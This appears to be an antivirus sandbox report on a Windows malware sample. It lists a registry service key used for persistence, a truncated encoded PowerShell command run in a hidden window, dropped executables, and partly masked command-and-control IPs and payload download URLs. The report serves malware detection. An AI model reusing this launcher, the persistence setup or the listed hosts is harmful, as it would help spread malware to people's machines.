Technical information
- [<HKLM>\System\CurrentControlSet\Services\dmime] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dmime] 'ImagePath' = '"%WINDIR%\SysWOW64\dmime\dmime.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIAHAAcQBvAG4AYQBiAHkAbABrAGUAPQAnAFIAdgB5AHgAcwBnAHMAcgBuAGEAJwA7ACQATABqAGUAYgBnAGsAeQBzAGgAIAA9ACAAJwAzADMAMAAnADsAJABYAGcAdQBoAGUAYgBzAGkAYwBuAG4AawA9ACcAUAB2AHIAdQBnAGwAcwBqAGwAbQAnAD...
- %HOMEPATH%\330.exe
- %HOMEPATH%\330.exe to %WINDIR%\syswow64\dmime\dmime.exe
- '47.##5.214.239':80
- '47.##5.214.239':443
- '20#.#46.22.34':443
- http://al###sonq.com/web_map/UkwFMlO/
- http://no#####.strzelecki.org/wp-includes/6jGh/
- http://20#.##6.22.34:443/leTeBjvynp13uh8Sr/YE4WE/04SAUaJAO2zNisJonJM/OUknwJ82ki6eglwA/ via 20#.#46.22.34
- DNS ASK al###sonq.com
- DNS ASK no#####.strzelecki.org
- '%HOMEPATH%\330.exe'
- '%WINDIR%\syswow64\dmime\dmime.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIAHAAcQBvAG4AYQBiAHkAbABrAGUAPQAnAFIAdgB5AHgAcwBnAHMAcgBuAGEAJwA7ACQATABqAGUAYgBnAGsAeQBzAGgAIAA9ACAAJwAzADMAMAAnADsAJABYAGcAdQBoAGUAYgBzAGkAYwBuAG4AawA9ACcAUAB2AHIAdQBnAGwAcwBqAGwAbQAnAD...' (with a hidden window)